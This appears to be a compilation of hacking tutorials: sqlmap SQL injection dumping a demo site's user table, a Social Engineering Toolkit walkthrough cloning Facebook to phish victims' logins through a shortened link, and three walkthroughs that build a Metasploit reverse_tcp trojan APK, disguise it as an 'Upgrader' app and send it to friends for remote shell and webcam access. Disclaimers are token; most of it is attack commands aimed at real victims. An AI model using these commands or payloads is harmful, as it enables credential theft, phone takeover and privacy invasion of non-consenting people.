Hacking Website with Sqlmap in Kali Linux

 Hacking Website with Sqlmap in Kali Linux

In the previous tutorial, we hacked a website using nothing but a simple browser on a
Windows machine. It was a pretty clumsy method to say the least. However, knowing the
basics is necessary before we move on to the advanced tools. In this tutorial, we'll be using
Kali Linux (see the top navigation bar to find how to install it if you haven't already) and
 SqlMap (which comes preinstalled in Kali) to automate what we manually did in
 theManual SQL Injection tutorial to hack websites.




Now it is recommended that you go through the above tutorial once so that you can get an idea
about how to find vulnerable sites. In this tutorial we'll skip the first few steps in which we find
 out whether a website is vulnerable or not, as we already know from the previous tutorial that
this website is vulnerable.

Kali Linux

First off, you need to have Kali linux (or backtrack) up and running on your machine.
 Any other Linux distro might work, but you'll need to install Sqlmap on your own.
Now if you don't have Kali Linux installed, you might want to go to this page,
which will get you started on Beginner Hacking Using Kali Linux

Sqlmap

Basically its just a tool to make Sql Injection easier. Their official website  introduces the
tool as -"sqlmap is an open source penetration testing tool that automates the process of
 detecting and exploiting SQL injection flaws and taking over of database servers. It comes
with a powerful detection engine, many niche features for the ultimate penetration tester and
 a broad range of switches lasting from database fingerprinting, over data fetching from the
 database, to accessing the underlying file system and executing commands on the operating
system via out-of-band connections."

A lot of features can be found on the SqlMap website, the most important being -
 "Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
" That's basically all the database management systems. Most of the time you'll never
 come across anything other than MySql. 

Hacking Websites Using Sqlmap in Kali linux

Sql Version

Boot into your Kali linux machine. Start a terminal, and type -

sqlmap -h

It lists the basic commands that are supported by SqlMap. To start with, we'll execute a simple
 command
sqlmap -u <URL to inject>. In our case, it will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1

Sometimes, using the --time-sec helps to speed up the process, especially when the
server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Either ways, when sqlmap is done, it will tell you the Mysql version and some other
 useful information about the database.

The final result of the above command should be something like this.

Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which have
to be answered in yes/no. Typing y means yes and n means no. Here are a few typical questions
 you might come across-

• Some message saying that the database is probably Mysql, so should sqlmap skip all 
• other tests and conduct mysql tests only. Your answer should be yes (y).
• Some message asking you whether or not to use the payloads for specific versions of 
• Mysql. The answer depends on the situation. If you are unsure, then its usually better 
• to say yes.

Enumeration

Database

In this step, we will obtain database name, column names and other useful data from the database.

List of  a few common enumeration commands

So first we will get the names of available databases. For this we will add --dbs to our previous
 command. The final result will look like -

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

 So the two databases are acuart and information schema.

Table

Now we are obviously interested in acuart database. Information schema can be thought of as
 a default table which is present on all your targets, and contains information about structure of
 databases, tables, etc., but not the kind of information we are looking for. It can, however, be
 useful on a number of occasions. So, now we will specify the database of interest using -D and
 tell sqlmap to enlist the tables using --tables command. The final sqlmap command will be-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this -
Database: acuart
[8 tables]

+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of columns.

Columns

Now we will specify the database using -D, the table using -T, and then request the columns
using --columns. I hope you guys are starting to get the pattern by now. The most appealing
table here is users. It might contain the username and passwords of registered users on the
website (hackers always look for sensitive data).

The final command must be something like-

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

The result would resemble this-

Data

Now, if you were following along attentively, now we will be getting data from one of the columns.
 While that hypothesis is not completely wrong, its time we go one step ahead. Now we will be
 getting data from multiple columns. As usual, we will specify the database with -D, table with -T,
and column with -C. We will get all data from specified columns using --dump. We will enter
 multiple columns and separate them with commas. The final command will look like this.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

 Here's the result

John Smith, of course. And the password is test. Email is email@email.com?? Okay, nothing
great, but in the real world web pentesting, you can come across more sensitive data. Under
 such circumstances, the right thing to do is mail the admin of the website and tell him to fix
 the vulnerability ASAP. Don't get tempted to join the dark side. You don't look pretty behind
 the bars. That's it for this tutorial. Try to look at other columns and tables and see what you can
 dig up. Take a look at the previous tutorial on Manual SQl Injection which will help you find
 more interesting vulnerable sites.

Hack Facebook with Social Engineering Toolkit – Kali : Credential Harvestor

In this tutorial i'll show you how to Simply use Social Engineering toolkit on Kali Linux

Requirements:
1. An Active Internet Connect.
2. Kali Linux
    (Download Kali Linux)

Steps:
1--> First of all open terminal and then type se-toolkit and hit enter. If you are not logged in as root then type sudo se-toolkit and hit enter it will ask you administrative password enter the password then it will ask you to accept licence agreement press 'y' (without quotes) and hit enter you'll be given a list

2--> from the menu enter 1 it will take you to another menu

3--> from above menu select "Website Attack Vectors" i,e press 2 and hit enter

4--> from above menu select "Credential Harvester Attack Method" i,e press 3 and hit enter

5--> from menu below select "Site Cloner" i,e press 2 and hit enter

6--> if it asks you your IP address then open another terminal and type ifconfig (if not logged as root then type sudo ifconfig) and copy your IP address and paste it in the previous terminal where it asked for IP address

7--> now enter the url to clone e,g http://www.facebook.com
wait a little bit...

{Note: Don't Close the se-toolkit running terminal cuz you'll recieve information there.}
8--> now shorten that copied IP Address using any url shortener service and then send the link to your victim if s/he enters his/her credentials you'll get them in your se-toolkit running terminal. And when you are done hit ctrl + c

{Note:- This Tutorial is for Educational Purpose Only}

Hack Any Android By Creating trojan virus for PHONE.

hello Hackers! Welcome to my Post:
This is a tutorial explaining how to hack android phones with Kali.
I can't see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

• Open a terminal, and make a Trojan .apk
• You can do this by typing :
• msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
• You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

• Open another terminal until the file is being produced.
• Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

• After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler

• Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
• To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

• At last type: exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.

• Then send it using Uploading it to Dropbox or any sharing website 
• (like:. www.mediafire.com)
• Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

• Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
• However, the option of allowance for Installation of apps fromUnknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
• And when he clicks Open...

Step 5: BOOM!

There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:

Keep coming for more!
Some post modules that work for windows might not work in android
For Eg: run killav, persistence (persistent backdoor) etc.

Thank You!

2nd way for android if first was confusing. read carefully all.

The Main Procedure:

When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)

step1: Open the terminal in Linux , type the below code and press enter.

:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk

If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).

Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.

Step3: Now open another terminal and type the below code.

> msfconsole

It takes sometime for metasploit to download and load its contents. So be patient!

Step4: When metasploit successfully loaded type the below code.

> use exploit/multi/handler

> set payload android/meterpreter/reverse_tcp

> set lhost 192.168.45.4 (the same ip address you entered in step1).

> set lport 8080 (the same port you used in step1).

> exploit

Now the console starts listening to 192.168.45.4 at port 8080.

Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.

Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.

Step7: As soon as you open the app in the device, you can see the connected device in console terminal.

Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.

Congrats! you have successfully hacked an android device.

Also See:

• Beginners Guide: Making the first Android Application Project
• Hacking Any Android Device Using AndroRAT App Binder
• How To Break Windows 8.1, 8, 7, Vista and Xp Administrator Password Using Kali Linux Live Boot
• Facebook Hacking Tools: Hack Facebook Accounts Using Android Phone

Note: Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.

3rd way of hacking with pics shown below.

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up you need to find your public/external ip and port forwarding 

Let's start,

Creating a booby trapped APK file

Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for theLPORT address.)

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

9. You can see the processes running by typing, “ps”:

You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.